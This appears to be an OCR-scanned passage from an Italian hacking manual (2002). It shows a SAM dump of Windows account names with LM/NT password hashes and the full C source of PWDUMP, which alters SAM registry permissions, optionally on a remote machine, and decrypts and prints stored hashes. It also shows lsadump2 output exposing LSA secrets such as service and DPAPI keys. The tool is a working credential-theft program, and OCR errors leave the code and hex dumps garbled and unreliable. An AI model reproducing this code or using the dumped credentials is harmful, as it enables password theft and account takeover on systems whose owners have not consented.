2C22BEA: Internet Guest Account, Built— in account for anonymous access to Internet 

Information Services:: 
IWAM_DEVELOPMENT:1004 : 6DA1D8651198C87 628E6400032FE7960 : 92D99D227B35A4A99D5BF3F20 
3400FlB:Launch US Process Account , Built— in account for Internet Information Ser 
vices to start out of process applications : : 

flavio:1005 : BFC551403DDD3 7FE0 70631D44 79AE3DE : 881CC0768C534D5DAAE4C069AF804239 : fi 
avio: : 

VUSR_DEVELOPMENT ': 1006 : 25EE7501658B45839329BD0A3BEAA54F : FA087FB3CB664CDECC338DD2C 
3792067 :VSA Server Account , Account per i componenti server di Visual Studio Anal 
yzer: : 

VUSR_DEVEL0PMENT1 : 1012 : 8DD628 79799FE1 0D8B6955CA2CD84186 :FE678EC221A211BBBAAADF5 7 
4C18316E :VSA Server Account , Account per i componenti server di Visual Studio Ana 
lyzer: : 

VUSR__DEVELOPMENT2 : 1013 : 6AB2CEEA81B413A6596606FEB46B06B2 : 40EA2723784CD4D33CF7C638 
055890D0 :VSA Server Account , Account for the Visual Studio Analyzer server compon 
ents: : 

ASPNET: 1014: 3F71AAF981 9A3976E8944F11C1D0CB76 : 8AB31 6F21E62D5 7FECAC1E2C2 785CB54 : as 
pnet wp account , Account for running ASP.NET Worker process:: 

VUSR_DEVELOPMENT3 :1015 : 3C586F313F4F6800620EB1 6B40C0A0BC: 77A7CC6EF671B59F82C50AB9 
6455537C :VSA Server Account , Account for the Visual Studio Analyzer server compon 
ents: : 

HelpAssistant_68c83e : 1018 : 5BF0C2C7AF21A8CBF157681CA6A33671 :D7FAA6332E01B7CC8F627 
54F7E97CBBB : Remote Desktop Help Assistant Account , Account for Providing Remote A 
ssistance : : 

SUPPORT__388945a0 : 1020 : BBD86CB77DD3DC809EA5C58027D03B89 : 3A03E0590AA97C27E0E08B98C 
F9F4856 : CN=Microsoft Corporation, L=Redmond, S=Washington, C=US, This is a vendor's 
account for the Help and Support Service:: 

F: \SystemTools> 



Il sorgente di PWDUMP è il seguente : 

^include <windows.h> 
iinclude <string.h> 
iinclude <stdlib.h> 
iinclude <stdio.h> 

iinclude "des.h" 

/* 

* Program to dump the Lanman and NT MD4 Hashed passwords from 

* an NT SAM database into a Samba smbpasswd file. Needs Administrator 

* privillages to run . 

* Takes one arg — the name of the machine whose SAM database you 

* wish to dump, if this arg is not given it dumps the locai machine 

* account database. 
*/ 

/* 

* Convert system error to char. Returns 

* memory allocated with LocalAlloc. 
*/ 

char *error to string (DWORD error) 
{ 

char *msgbuf; 

if (FormatMessage ( 

FORMAT_MESSAGE_ALLOCATE_BUFFER / FORMAT_MESSAGE__FROM_SYSTEM, 
NULI, 
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MAKELANGID (LANG_NEUTRAL, SUBLANG^DEFAULT) , /* Default language */ 
(char *) &msgbuf, 
0, 

NULL 
) == 0) 
return 0; 
return msgbuf; 

} 

/* 

* Return a pointer to a string describing an os error. 

* error to string returns a pointer to LocalAlloc ' ed 

* memory. Cache it and release when the next one is 

* requested. 
*/ 

char *str_oserr (DWORD err) 
{ 

static char *lastmsg = 0; 

if (lastmsg) 

LocalFree ( (HLOCAL) lastmsg) ; 

lastmsg = error_to_string (err) ; 
return lastmsg; 

} 

/* 

* Utility function to get allocate a SID from a name. 

* Looks on locai machine. SID is allocated with LocalAlloc 

* and must be freed by the Caller. 

* Returns TRUE on success, FALSE on fail . 
*/ 

BOOL get_sid(const char *name, SID **ppsid) 
{ 

SID_NAME_USE sid^use; 
DWORD sid_size = 0; 
DWORD dom_size = 0; 
char *domain; 

*ppsid = 0; 

if (LookupAccountName (0, name, 0, &sid_size, 0, Sdom_size, &sid_use) == 0) { 
if (GetLastError () != ERROR_INSUFFICIENT_BUFFER) { 

fprintf ( stderr, "get_sid: LookupAccountName for size on name %s failed. Error 
was %s\n" / 

name, str_oserr (GetLastError () ) ) ; 
return FALSE; 

} 

} 

*ppsid = (SID *) LocalAlloc ( LMEM_FIXED, sid_size) ; 
domain = (char *) LocalAlloc ( LMEM_FIXED, dom_size) ; 
if( *ppsid ==011 domain == 0) { 

fprintf ( stderr, "get sid: LocalAlloc failed. Error was %s\n" / 
str_oserr (GetLastError () ) ) ; 

if (*ppsid) 

LocalFree ( (HLOCAL) *ppsid) ; 
if (domain) 

LocalFree ( (HLOCAL) domain) ; 
*ppsid = 0; 
return FALSE; 

} 

if (LookupAccountName (0 , name, *ppsid, Ssid_size, domain, Sdom_size, Ssid_use) == 0) 

{ 

fprintf ( stderr, 

"get_sid: LookupAccountName failed for name %s. Error was %s\n", 

name, str oserr (GetLastError () ) ) ; 
LocalFree ( (HLOCAL) *ppsid) ; 
LocalFree ( (HLOCAL) domain) ; 
*ppsid = 0; 
return FALSE; 

) 
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/* 

* Utility function to setup a security descriptor 

* from a varargs list of char *name followed by a DWORD access 

* mask. The access control list is allocated with LocalAlloc 

* and must be freed by the Caller. 

* returns TRUE on success, FALSE on fail . 
*/ 

BOOL create_sd_from_list( SECURITY_DESCRIPTOR *sdout, int num, ...) 
{ 

va_list ap; 
SID **sids = 0; 
char *name; 
DWORD amask; 
DWORD acl_size; 
PACL paci = 0; 
int i; 

if((sids = (SID **)calloc(l,sizeof(SID *) *num) ) == 0) { 
fprintf (stderr, "create_sd_from_list: calloc fail .\n") ; 
return FALSE; 

ì 

acl size = num * (sizeof(ACL) + 

sizeof (ACCESS_ALLOWED_ACE) + 
sizeof (DWORD) ) ; 

/* Collect ali the SID's */ 

va_start ( ap, num) ; 

for( i = 0; i < num; i++) { 

name = va_arg( ap, char *) ; 

amask = va__arg (ap, DWORD); 

if (get_sid( name, Ssids [i] ) == FALSE) 
goto cleanup; 

acl_size += GetLengthSidfsids [i] ) ; 

} 

va_end(ap) ; 

if((pacl = (PACL) LocalAlloc ( LMEM_FIXED, acl_size) ) == 0) { 

fprintf ( stderr, "create sd from_list: LocalAlloc fail. Error was %s\n", 

str_oserr (GetLastError () ) ) ; 
goto cleanup; 

} 

if (InitializeSecurityDescriptor ( sdout, SECURITY_DESCRIPTOR_REVISION) == FALSE) { 
fprintf ( stderr, "create sd_from__list : InitializeSecurityDescriptor fail. Error 
was %s\n" / 

str_oserr (GetLastError () ) ) ; 

goto cleanup; 

} 

if (InitializeAcl ( paci, acl^size, ACL_REVISION) == FALSE) { 

fprintf ( stderr, "create sdfrom_list : InitializeAcl fail. Error was %s\n", 
str_oserr (GetLastError () ) ) ; 

goto cleanup; 

} 

va_start (ap, num) ; 

for( i = 0; i < num; i++) { 

ACE^HEADER *ace_j>; 

name = va__arg ( ap, char *) ; 

amask = vaarg ( ap, DWORD) ; 

if (AddAccessAllowedAce ( paci, ACL_REVISION, amask, sids[i]) == FALSE) { 

fprintf ( stderr, "create_sd_from_list : AddAccessAllowedAce fail . Error was 

%s\n", 

str_oserr (GetLastError () ) ) ; 
goto cleanup; 

} 

/* Make sure the ACE is inheritable */ 
if(GetAce( paci, 0, (LPVOID *)&ace_p) == FALSE) { 

fprintf ( stderr, "create sd_from_list : GetAce fail. Error was %s\n", 
str_oserr (GetLastError () ) ) ; 

goto cleanup; 

} 

ace_p->AceFlags /= ( CONTAINER_INHERIT_ACE / OBJECT_INHERIT_ACE) ; 

) 
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if (SetSecurityDescriptorDacl ( sdout, TRUE, paci, FALSE) == FALSE) { 

fprintf ( stderr, "create sd_from_list : SetSecurityDescriptorDacl fail . Error was 
%s\n", 

str_oserr (GetLastError () ) ) ; 
goto cleanup; 

} 

for( i = 0; i < num; i++) 
if(sids[i] != 0) 

LocalFree ( (HLOCAL) sids [i] ) ; 
free (sids) ; 

return TRUE; 

cleanup: 

if(sids != 0) { 

for( i = 0; i < num; i++) 
if(sids[i] != 0) 

LocalFree ( (HLOCAL) sids [i]) ; 
free (sids) ; 

} 

if(pacl '.= 0) 

LocalFree ( (HLOCAL) paci) ; 
return FALSE; 

) 

/* 

* Function to go over ali the users in the SAM and set an ACL 

* on them . 
*/ 

int set_userkeys_security ( HKEY start, const char *path, SECURITY_DESCRIPTOR *psd, 

HKEY *return_key) 

{ 

HKEY key; 

DWORD err; 

char usersid[128] ; 

DWORD indx = 0; 

/* Open the path and enum ali the user keys - setting 

the same security on them. */ 
if((err = RegOpenKeyEx ( start, path, 0, KEY_ENUMERATE_SUB_KEYS , &key) ) ! = 

ERROR_SUCCESS) { 
fprintf (stderr, "set_userkeys_security : Failed to open key %s to 

enumerate . \ 
Error was %s . \n ", 

path, str_oserr (err) ) ; 

return -1; 

} 



/* Now enumerate the subkeys, setting the security on them ali. */ 
do { 

DWORD size; 
FILETIME ft; 

size = sizeof (usersid) ; 

err = RegEnumKeyEx ( key, indx, usersid, Ssize, 0, 0, 0, Sft) ; 
if(err == ERROR_SUCCESS) { 
HKEY subkey; 

indx++; 

if ( (err = RegOpenKeyEx ( key, usersid, 0, WRITE_DAC, & subkey ) ) ! = 
ERROR__SUCCESS) { 
fprintf (stderr, "set_userkeys_security : Failed to open 

key %s to set security. \ 
Error was %s . \n ", 

usersid, str_oserr (err) ) ; 
RegCloseKey (key) ; 
return —1; 

} 

if((err = RegSetKey Security ( subkey, DACL_SECURITY_INFORMATION, 

psd)) ! = 

ERROR_SUCCESS) { 

fprintf (stderr, "set_userkeys_security: Failed to set 

security on key %s. \ 
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usersid, str_oserr (err) ) ; 
RegCloseKey (subkey) ; 
RegCloseKey (key) ; 
return -1; 

ì 

RegCloseKey (subkey) ; 

} 

} while(err == ERROR_SUCCESS) ; 

if(err != ERROR_NO_MORE_ITEMS) { 
RegCloseKey (key) ; 
return -1; 

} 

if (return_key == 0) 

RegCloseKey (key) ; 

else 

*return_key = key; 
return 0; 

} 

/* 

* Function to travel down the SAM security tree in the registry and restore 

* the correct ACL on them. Returns 0 on success. —1 on fall. 
*/ 

int restore_sam_tree_access ( HKEY start ) 
{ 

char path[128] ; 
char *p; 
HKEY key; 
DWORD err; 

SECURITY_DESCRIPTOR sd; 
DWORD admin_mask; 

admin^mask = WRITE^DAC / READ__CONTROL; 

if(create_sd_from__list( &sd, 2, "SYSTEM", GENERIC^ALL, 

"Administrators " , adminmask) == 

FALSE) 

return -1; 

strcpyf path, "SECURITY\\SAM\\Domains\\Account\\Users") ; 

/* Remove the security on the user keys first . */ 
if (set_userkeys_security ( start, path, Ssd, 0) != 0) 
return -1; 

/* now go up the path, restoring security */ 
do { 

if ( (err = RegOpenKeyEx ( start, path, 0, WRITE_DAC, Skey) ) ! = 

ERROR^SUCCESS) { 
fprintf (stderr, "restore_sam_tree_access :Failed to open key %s 

to set \ 

security. Error was %s.\n", 

path, str_oserr (err) ) ; 

return -1; 

} 

if((err = RegSetKeySecurity ( key, DACL_SECURITY_ INFORMATION, 

&sd)) ! = 

ERROR_SUCCESS) { 

fprintf (stderr, "restore_sam_tree_access : Failed to set security 

on key %s. \ 
Error was %s . \n ", 

path, str_oserr (err) ) ; 
RegCloseKey (key) ; 
return -1; 

} 

RegCloseKey (key) ; 

p = strrchr (path, '\\'); 

if( p != 0) 

*P = 0; 
} while( p != 0 ); 



return 0; 

} 
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* Function to travel the security tree and add Adminlstrators 

* access as WRITE_DAC, READ_CONTROL and READ. 

* Returns 0 on success. -1 on fall if no security was changed, 

* —2 on fail if security was changed. 
*/ 

int set_sam tree_access( HKEY start, HKEY *returnkey) 
{ 

char path [ 128 ] ; 
char *p; 
HKEY key; 
DWORD err; 

BOOL security_changed = FALSE; 
SECVRITY_DESCRIPTOR sd; 
DWORD admin_mask; 
BOOL finished = FALSE; 

admin_mask = WRITE_DAC / READ^CONTROL / KEY_QUERY_VALUE / 
KEY_ENUMERATE_SUB_KEYS; 

if(create_sd_from_list( Ssd, 2, "SYSTEM", GENERI C__ALL , 

"Administrators" , admin mask) == 

FALSE) 

return -1; 

strcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users") ; 
p = strchrfpath, '\\'); 

do { 

if( p != 0) 

*p = 0; 

else 

finished = TRUE; 
if((err = RegOpenKeyEx ( start, path, 0, WRITE_DAC , &key) ) ! = 

ERROR^SUCCESS) { 
fprintf (stderr , "set_sam_tree_access : Failed to open key %s to 

set \ 

security. Error was %s.\n", 

path, str_oserr (err) ) ; 
return (security_changed ? -2: -1) ; 

) 

if((err = RegSetKeySecurity ( key, DACL_SECURI TY_ INFORMA TION, 

Ssd)) ! = 

ERROR_SUCCESS) { 

fprintf (stderr, "set_sam_tree_access : Failed to set security on 

key %s. \ 

Error was %s . \n ", 

path, str_oserr (err) ) ; 
RegCloseKey (key) ; 

return (security__changed ? -2: -1) ; 

} 

security changed = TRUE; 
RegCloseKey (key) ; 
if(p != 0) { 

*p++ = '\\'; 

p = strchrfp, '\\ '); 

} 

} while ( ! finished ); 

if (set userkeys security ( start, path, Ssd, Skey) != 0) 

return —2; 
if (return key == 0) 

RegCloseKey (key) ; 

else 

*return_key = key; 
return 0; 

} 

/* 

* Function to get a little— endian int from an offset into 

* a byte array. 
*/ 

int get_int ( char *array ) 
{ 

return ( (array [0] SOxff) + ( (array [1] «8) SOxffOO) + 
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C (array[3] «24) SOxffOOOOOO) ) ; 



} 

/* 

* Convert a 7 byte array into an 8 byte des key with odd parity. 
*/ 

void atr_to_key (unsigned char *str, unsigned char *key) 
{ 

void dea_aet_odd _parity (des_cblock *) ; 
int i; 

key[0] = atr[0]»l; 

key[l] = ( (str[0]&0x01)«6) / (str[l]»2) ; 
key [2] = ( (str [1] &0x03) «5) / (atr[2]»3) ; 
key [3] = ( (str [2] &0x07) «4) / (str[3]»4) ; 
key [4] = ( (str [3] &OxOF) «3) / (str[4]»5) ; 
key [5] = ( (str [4] &OxlF) «2) / (str[5]»6) ; 
key [6] = ( (str [5] &0x3F) «1) / (str[6]»7) ; 
key[7] = str [6] &0x7F; 
for (i=0;i<8;±++) { 

key li] = (key[i]«l); 

} 

des_set_odd_parity ( (des_cblock *) key) ; 

} 

/* 



* Function to convert the RID to the first decrypt key. 
*/ 

void sid_to_keyl (unsigned long sid, unsigned char deskey[8]) 
{ 

unsigned char s[7]; 

s[0] = (unsigned char) (sid & OxFF) ; 
s[l] = (unsigned char) ( (sid»8) S OxFF) ; 
s[2] = (unsigned char) ( (sid»16) S OxFF) ; 
s[3] = (unsigned char) ( (sid»24) & OxFF); 
a [4] = a [01; 
a[5] = a[ll; 
a [61 = a [21; 



atr_to_key (a, deakey) ; 



} 

/* 

* Function to convert the RID to the aecond decrypt key. 
*/ 

void aid to key2 (unaigned long sid, unsigned char deakey [8]) 
{ 

unaigned char a [7]; 

a[0] = (unaigned char) ( (aid»24) S OxFF); 

a [11 = (unaigned char) (aid & OxFF); 

a [2] = (unaigned char) ( (aid»8) S OxFF) ; 

a [31 = (unaigned char) ( (aid»16) & OxFF) ; 

a [4] = a [01; 

a[5] = a [11; 

a [61 = a [21; 



atr_to_key (a, deakey) ; 



} 
/* 

* Function to aplit a 'V entry into a uaera name, paaaworda and comment . 
*/ 

int check vp (char *vp, int vp_aize, char **uaername, char **fullname, 

char **comment, char **homedir, 
char *lanman, int *got__lanman , 
char *md4, int *got_md4 , 
DWORD rid 
) 



dea_key_achedule kal, ka2; 
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int username_offset = get__±nt (vp + OxC) ; 
int username_len = get_int (vp + 0x10); 
int fullname^offset = get_int (vp + 0x18); 
int fullname len = get_int (vp + Oxlc) ; 
int comment__offset = get_int (vp + 0x24); 
int comment^len = get_int (vp + 0x28); 
int homedir_offset = get__int (vp + 0x48); 
int homedir len = get_int (vp + 0x4c) ; 
int pw_offset = get_int (vp + 0x9c) ; 

*username = 0; 
* fullname = 0; 
*comment = 0; 
*homedir = 0; 
*got_lanman = 0; 
*got_md4 = 0; 

if (username len < 0 \\ username offset < 0 II comment len < 0 II 
fullname_len < 0 / / homediroffset < 0 / / 
comment^offset < 0 / / pw_offset < 0) 
return -1; 
username^offset += OxCC; 
fullname_offset += OxCC; 
comment_offset += OxCC; 
homediroffset += OxCC; 
pw_offset += OxCC; 

if ( (*username = (char *)malloc (username len + 1) ) == 0) { 

fprintf (stderr, "check vp: malloc fail for username .\n" ) ; 
return -1; 

} 

if ((* fullname = (char *) malloc (fullname_len + 1) ) == 0) { 

fprintf (stderr , "check vp: malloc fail for username .\n") ; 
free (*username) ; 
*username = 0; 
return -1; 

} 

if((*comment = (char *) malloc (comment len + 1) ) == 0) { 

fprintf (stderr , "check vp: malloc fail for comment .\n" ) ; 

free (*username) ; 

*username = 0; 

free (* fullname) ; 

* fullname = 0; 

return -1; 

} 

if((*homedir = (char *) malloc (homedir len + 1) ) == 0) { 

fprintf (stderr , "check vp: malloc fail for homedir .\n") ; 

free (*username) ; 

*username = 0; 

free (* fullname) ; 

* fullname = 0; 

free (*comment) ; 

*comment = 0; 

return —1; 

} 

wcstombs ( *username, (wchar t *) (vp + username offset), 
username^len/sizeof (wchar__t) ) ; 

(*username) [username^len/sizeof (wchar t) ] = 0; 
wcstombs ( *fullname, (wchar _t *) (vp + fullname_offset) , 
fullname len/sizeof (wchar_t) ) ; 

(* fullname) [fullname len/ sizeof (wchar t) ] = 0; 
wcstombs ( *comment, (wchar t *) (vp + commentoffset), 
comment len/sizeof (wchar^t) ) ; 

(*comment) [commentlen/sizeof (wchar_t) ] = 0; 
wcstombs ( *homedir, (wchar_t *) (vp + homedir off set) , 
homedirlen/sizeof (wchar t) ) ; 

(*homedir) [homedir len/sizeof (wchar_t) ] = 0; 

if (pw^offset >= vp^size) { 
/* No password */ 
*got lanman = 0; 
*got_md4 = 0; 
return 0; 

} 

/* Check that the password offset plus the size of the 
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if (pw_offset + 32 > vp^size) { 
/* Account disabled ? */ 
*got lanman = —1; 
*got_md4 = -1; 
return 0; 



/* Get the two decrpt keys. */ 
sid_to_keyl (rid, (unsigned char *) deskeyl) ; 
des_set_key ( (des_cblock *) deskeyl , ksl) ; 
sid_to_key2 (rid, (unsigned char *) deskey2) ; 
des_set_key ( (des_cblock *) deskey2, ks2) ; 

vp += pw_offset; 

/* Decrypt the lanman password hash as two 8 byte blocks . */ 
des_ecb_encrypt ( (des_cblock *)vp, 

(des_cblock *) lanman, ksl, DES_DECRYPT) ; 
des_ecb_encrypt ( (des_cblock *) (vp + 8), 

(des_cblock *) Slanman [8] , ks2, DES DECRYPT) ; 

vp += 16; 

/* Decrypt the NT md4 password hash as two 8 byte blocks. */ 
des_ecb_encrypt ( (des_cblock *)vp, 

(des_cblock *)md4, ksl, DES_DECRYPT) ; 
des_ecb_encrypt ( (des_cblock *) (vp + 8), 

(des_cblock *)&md4[8], ks2, DES DECRYPT) ; 

*got_lanman = 1; 
*got_md4 = 1; 
return 0; 



/* 

* Function to print out a 16 byte array as hex. 
*/ 

void print hexval (char *val) 
{ 

int i; 

for(i = 0; i < 16; i++) 

print f ("%02X" , (unsigned char) vai [i] ) ; 

} 

/* 

* Function to strip out any ' : ' or '\n', '\r' from a text 

* string. 
*/ 

void strip_text ( char *txt ) 
{ 

char *p; 

for( p = strchr (txt , ' :'); p ; p = strchr ( p + 1, 
*P = 

for( p = strchr (txt, '\n'); p ; p = strchr (p + 1, 
*P = 

for( p = strchr (txt, '\r'); p ; p = strchr (p + 1, 
*P = '_'/ 

; 



'\n')) 
'\r')) 



/* 

* Function to dump a users smbpasswd entry onto stdout . 

* Returns 0 on success, -1 on fail . 
*/ 



int printout__smb_entry ( HKEY user, DWORD rid ) 
{ 

DWORD err; 
DWORD type; 
DWORD size = 0; 
char *vp; 
char lanman [16] ; 
char md4_hash [16] ; 
char *username; 
char *fullname; 
char *comment ; 
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int got lanman; 
int got_md4; 

/* Find out how much space we need for the 'V valile. */ 
if((err = RegQueryValueEx ( user, "V" , 0, Stype, 0, Ssize) ) 

!= ERROR_SUCCESS) { 
fprintf (stderr, "printoutsmb • entry : Unable to determine size needed \ 
for user 'V value. Error was %s.\n.", str_oserr (err) ) ; 
return -1; 

} 

if((vp = (char *) malloc (size) ) == 0) { 

fprintf (stderr , "printoutsmb entry : malloc fail for user entry. \n" ) ; 
return -1; 

} 

if((err = RegQueryValueEx ( user, "V", 0, Stype, (LPBYTE)vp, Ssize)) 

!= ERROR_SUCCESS) { 
fprintf (stderr, "printout_smb_entry : Unable to read user 'V value. \ 
Error was %s.\n.", str_oserr (err) ) ; 
free (vp) ; 
return -1; 

} 

/* Check heuristics */ 

if (check vp (vp , size, Susername, Sfullname, Scomment, 

Shomedir, lanman, Sgot lanman, 
md4_hash, Sgot_md4, rid) != 0) { 
fprintf (stderr, "Failed to parse entry for RID %X\n", rid) ; 
free (vp) ; 
return 0; 

} 

/* Ensure username of comment don't have any nasty suprises 
for us such as an embedded ': ' or '\n' - see multiple UNIX 
passwd field update security bugs for details. . . */ 

strip_text ( username ) ; 

strip_text ( fullname ) ; 

strip^text ( comment ) ; 

/* If homedir contains a drive letter this mangles it - but it protects 

the integrity of the smbpasswd file. */ 
strip_text ( homedir ) ; 

printf ( "%s : %d: " , username, rid); 
if (got_lanman) { 

if (got^lanman == -1) /* Disabled account ? */ 

printf ( n ******************************** ") ; 

else 

print hexval (lanman) ; 

} else 

printf ("NO PASSWORD*********************'') ; 
printf (": "); 
if(got_md4) { 

if (got_md4 == -1) /* Disabled account ? */ 

printf ( "******************************** ") ; 

else 

print_hexval (md4 hash) ; 

} else 

printf ("NO PASSWORD*********************'') ; 
printf (" : ") ; 
if (* fullname) 

printf ( "%s ", fullname) ; 
if (* fullname SS *comment) 

printf (", "); 
if (*comment) 

printf ( "%s ", comment ) ; 
printf ( " : ") ; 
if (*homedir) 

printf ( "%s ", homedir) ; 
printf ( " : \n ") ; 

free (username) ; 
free (comment) ; 
free (homedir) ; 
free ( vp) ; 
return 0; 

} 
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*/ 

int enumerate users ( HKEY key) 
{ 

DWORD indx = 0; 
DWORD err; 
DWORD rid; 
char usersid[128] ; 

do { 

DWORD size; 
FILETIME ft; 

size = sizeof (usersid) ; 

err = RegEnumKeyEx ( key, indx, usersid, Ssize, 0, 0, 0, Sft) ; 
if(err == ERROR_SUCCESS) { 
HKEY subkey; 

indx++; 

if((err = RegOpenKeyEx ( key, usersid, 0, KEY_QUERY_VALUE, 

S subkey ) ) != 

ERROR_SUCCESS) { 
fprintf (stderr, "enumerate_users : Failed to open key %s 

to read value. \ 
Error was %s . \n ", 

usersid, str_oserr (err) ) ; 
RegCloseKey (key) ; 
return -1; 

} 

rid = strtoul (usersid, 0, 16); 

/* Hack as we know there is a Names key nere */ 
if(rid != 0) { 

if (printout_smb_entry ( subkey, rid ) != 0) { 

RegCloseKey (subkey) ; 

return -1; 

} 

} 

RegCloseKey (subkey) ; 

} 

} whileferr == ERROR_SUCCESS) ; 

if(err != ERROR_NO_MORE__ITEMS) { 
RegCloseKey (key) ; 
return -1; 

} 

return 0; 

} 

/* 

* Print usage message and die. 
*/ 

void usage (const char *argO) { 

fprintf (stderr, "Usage: %s <\ \ \ \machine>\n ", argO) ; 
exit(-l); 

} 

/* 

* usage : \ \machine 
*/ 

int mainfint argc, char **argv) 
{ 

char username [128] ; 
DWORD size; 

HKEY start_key = HKEY_LOCAL_MACHINE; 
HKEY users_key; 
int err; 

if (argc > 2) 

usage (argv[0] ) ; 

/* 

* Ensure we are running as Administrator before 

* we will run. 
*/ 
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fprintf (stderr, "%s: GetUserName ( ) failed. Error was %s.", 

argv[0 ] , str_oserr (GetLastError ( ) ) ) ; 
return -1; 

} 

if(stricmp( "Administrator" , username) .' = 0) { 

fprintf (stderr , "%s: You must be running as user Administrator \ 
to run this program\n" , argv[0] ) ; 

return -1; 

} 

/* 

* Open a connection to the remote machines registry . 
*/ 

if(argc == 2) { 

if ( (err = RegConnectRegistry ( argv[l], HKEY_LOCAL_MACHINE, &start_key) ) 

i = 

ERROR^SUCCESS) { 

fprintf (stderr, "%s: Failed to connect to registry on remote 

computer %s . \ 

Error was %s.\n", argv[0], argv[l], str__oserr (err) ) ; 
return -1; 

} 

} 

/* 

* We need to get to HKEY LOCAL_MACHINE\ SECURITY\SAM\Domains \Account \ Users . 

* The security on this key normally doesn't allow Administrators 

* to read - we need to add this. 
*/ 

if ( (err = set_sam_tree_access ( start_key, &users_key) ) != 0) { 
if(err == -2) 

restore_sam_tree_access ( start_key) ; 
return -1; 

} 

/* Print the users SAM entries in smbpasswd format onto stdout. */ 

enumerate_users ( users^key ) ; 

RegCloseKey (users_key) ; 

/* reset the security on the SAM */ 

restore_sam_tree_access ( start__key ); 

if (start^key != HKEY^LOCAL MACHINE) 

RegCloseKey (start_key) ; 
return 0; 



LSA 

Un'altra delle spade nel fianco dei sistemi Windows è relativa alle informazioni che mediante 
un utility che si chiama Isadump2 si possono ottenere. 



E: \Rhino9\lsadump2>lsadump2 




















$MACHINE.ACC 




















E8 17 E6 E8 CC 3D 74 OD A7 


48 


53 


F3 


29 


AE 


69 


A3 


=t. .HS.) . 


, i . 


BC 54 D8 E9 6D 46 EC 62 9E 


00 


FA 


7F 










. T. .mF.b. . . . 




aspnet_WP_PASSWORD 




















4E 00 6D 00 69 00 61 00 31 


00 


4E 


00 


48 


00 


68 


00 


N.m.i.a.l.N.H. 


h. 


36 00 45 00 
















6. E. 




DefaultPassword 




















DPAPI__SYSTEM 




















01 00 00 00 B4 2F BD AD 6F 


Bl 


5B 


44 


EA 


FD 


02 


FC 


/ ■ ■ o . [D . . 




2E 5A 21 BA 99 DC 09 7B FI 


FB 


27 


DI 


AB 


B2 


68 


FF 


.Z! ....{..'.. . 


h. 


34 D6 20 42 DO FC B8 60 DI 


01 


83 


BC 










4. B. . 




MicrosoftSQLServerAgentProxyPasswordKey 












5A FA FE B5 25 75 34 36 45 


23 


25 


60 


OE 


82 


9C 


53 


Z. . . %u46E§%* . . 


.S 


83 A9 9C E8 09 3B 85 80 87 


75 


06 


01 


85 


El 


9E 


51 


; ... u ... . 


■ Q 


NL$KM 




















E2 AC 22 CO AE BC 7F CC 44 


2F 


F5 


33 


36 


66 


DI 


94 


. . " D/.36f. . 


30 93 9D BA C5 OA 96 F5 FD 


DA 


F9 


6D 


01 


06 


87 


CE 


0 m. . 




50 37 92 1E 49 7A 76 38 4F 


78 


92 


5A 


21 


19 


3A 


EA 


P7. .Izv80x.Z! . 




E2 2C FB 4F A5 FE 82 35 DI 


12 


F7 


C7 


20 


11 


E9 


1A 


., .0. . .5 




SAC 




















02 00 00 00 





















Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



02 


00 


00 


00 








































SCM: 


{3D14228D-FBE1- 


-11D0-995D-OOC04FD919C1 } 




















45 


00 


55 


00 


74 


00 


39 


00 


79 


00 


48 


00 


4F 


00 


6B 


00 


E. 


U. 


t. 


9. 


y.H. 


O. 


k. 


44 


00 


61 


00 


24 


00 


30 


00 


46 


00 


72 


00 


00 


00 






D. 


a . 


■ $. 


0. 


F.r, 






SCM: 


(6c736d4F-CBDl- 


-11D0-B3A2-00A0C91E29FE) 




















71 


00 


75 


00 


5B 


00 


77 


00 


57 


00 


67 


00 


46 


00 


5B 


00 


<!■ 


u. 


[■ 


w. 


W.g. 


F. 


■ [■ 


52 


00 


36 


00 


71 


00 


7C 


00 


37 


00 


47 


00 


00 


00 






R. 


6. 




/■ 


. 7.G. . . 




SCM: 


{B1D27591-DDCC-11D0-938B-00A0C9034910) 




















32 


00 


31 


00 


4A 


00 


21 


00 


22 


00 


2F 


00 


77 


00 


29 


00 


2. 


1. 


J. 


; , 


■ "■/■ 


w. 


) ■ 


39 


00 


63 


00 


30 


00 


4F 


00 


35 


00 


4F 


00 


00 


00 






9. 


c. 


0. 


O. 


5.0. 






SCM: 


{D0362CF9-9DAC- 


-4898-8D1A-CC1 1034B1B68) 




















65 


00 


33 


00 


41 


00 


72 


00 


54 


00 


50 


00 


3D 


00 


29 


00 


e. 


3. 


A. 


r . 


, T.P. 


. = . 


). 


32 


00 


38 


00 


4D 


00 


5A 


00 


6B 


00 


73 


00 


00 


00 






2. 


8. 


M. 


Z. 


k.s. 






SCM: 


{D1362CF9-9DAC- 


-4898-8D1A-CC1 1034B1B68) 




















65 


00 


33 


00 


41 


00 


72 


00 


54 


00 


50 


00 


3D 


00 


29 


00 


e. 


3. 


A. 


r. 


T.P. 




). 


32 


00 


38 


00 


4D 


00 


5A 


00 


6B 


00 


73 


00 


00 


00 






2. 


8, 


M. 


Z. 


.k.s. 






XATM: ae448fc0-069f- 


-4980-b998-f2ccd2cbb6b3 




















5B 


00 


76 


00 


EB 


00 


DB 


00 


6F 


00 


AF 


00 


7E 


01 


45 


00 


[■ 


V. 






o. . . 




E. 


42 


00 


C9 


00 


61 


01 


6B 


00 


DC 


00 


EF 


00 


C4 


00 


66 


00 


B. 




. a . 


k. 






f. 


23 


00 


1D 


00 


AE 


00 


7E 


00 


C6 


00 


FF 


00 


19 


00 


3E 


00 


#. 






~ . 






> . 


19 


20 


7C 


00 


92 


01 


6E 


00 


C2 


00 


34 


00 


40 


00 


2A 


00 




I. 




n . 


. .4. 


e. 




B4 


00 


78 


01 


41 


00 


7E 


00 


56 


00 


E9 


00 


26 


20 


1E 


00 




X. 


A. 


~ . 


V. . . 


s 




7A 


00 


31 


00 


4A 


00 


6A 


00 


18 


20 


15 


00 


AF 


00 


F9 


00 


z . 


1. 


,J. 


j- 








5E 


00 


EA 


00 


5E 


00 


92 


01 


14 


20 


68 


00 


38 


00 


65 


00 


A 




A 




. . h. 


8. 


. e. 


A9 


00 


53 


00 


EF 


00 


FI 


00 


52 


00 


B4 


00 


13 


20 


F2 


00 




fi 






R. . . 






4D 


00 


FF 


00 


1A 


20 


13 


20 


11 


00 


4B 


00 


FC 


00 


23 


00 


Af 








. . K. 




#. 


13 


00 


27 


00 


BC 


00 


E6 


00 


A9 


00 


03 


00 


21 


20 


3B 


00 




1 








i 


/ • 


CA 


00 


C7 


00 


CO 


00 


26 


00 


72 


00 


1D 


20 


6C 


00 


22 


00 








&. 


r.. 


1. 


ti 


